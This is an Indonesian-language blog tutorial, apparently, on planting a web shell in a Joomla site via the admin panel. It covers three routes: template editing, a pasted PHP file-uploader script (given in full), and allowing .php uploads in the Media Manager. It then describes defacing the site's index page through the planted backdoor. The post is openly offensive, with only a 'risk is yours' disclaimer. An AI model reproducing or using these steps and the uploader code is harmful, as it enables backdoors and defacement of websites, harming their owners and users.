Langsung ajah :D
Pada tutorial saya kali ini, saya akan shere bagaimana cara mengupload shell
ke web joomla.
Alat dan bahan
- Shell (Wajib) kalau blum punya download di SINI
Itu ajah :D :D
[#] Mengupload shell lewat Template
1. Pilih template manager
2. kemudian klik Template ( 1 ), pilih salah satu template di situ,
di sini saya memilih template Atomic ( 2 ), klik template tersebut
3. Pilih Edit main page template
Nanti akan muncul seperti ini :
Cara memanggil shell : http://site.com/templates/atomic/index.php
[#] Mengupload shell lewat template administrator
1. Pilih Template
2. Lihat template yang aktif ( terdapat tanda bintang ),
3. Kemudian pilih Templates, lihat gbr :
4. Klik template terssebut, kemudian pilih Edit main page template
5. Sisipkan Script berikut pada kolom editornya :
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>
Lalu save.
Jika berhasil, akan muncul kotak upload, lihat gbr
6. Upload shell kamu di situ. jika berhasil mengupload shell, akan muncul Upload sukses,
Cara memanggil shell : http://site.com/administrator/namashell.php
[#] Mengupload shell lewat Media Manager
1. pilih media manager
2. Pilih options, nanti akan muncul seperti ini :
3. Tambahkan php pada kotak Legal Extension, kemudian save
4.Sekarang, upload shell kamu
Cara memanggil Shell : http://site.com/images/namashell.php
Jika sudah tanam shell/backdoor, Sekarang kita akan mengganti Index/halaman utama Web tersebut.
1. Masuk ke Shell kamu.
2.Cari Index.php lalu pilih edit
3.Hapus semua script lalu pastekan Script Deface Kamu di kotak tersebut, lalu Save
4. Jika berhasil, Script deface kamu akan muncul di halaman utama web.
Gampang-gampang susah kan :D
oke, sekian dulu yah, semoga bermanfaat
PERHATIAN
Resiko tanggung sendiri,
Admin hanya sekedar berbagi
0 comments:
Post a Comment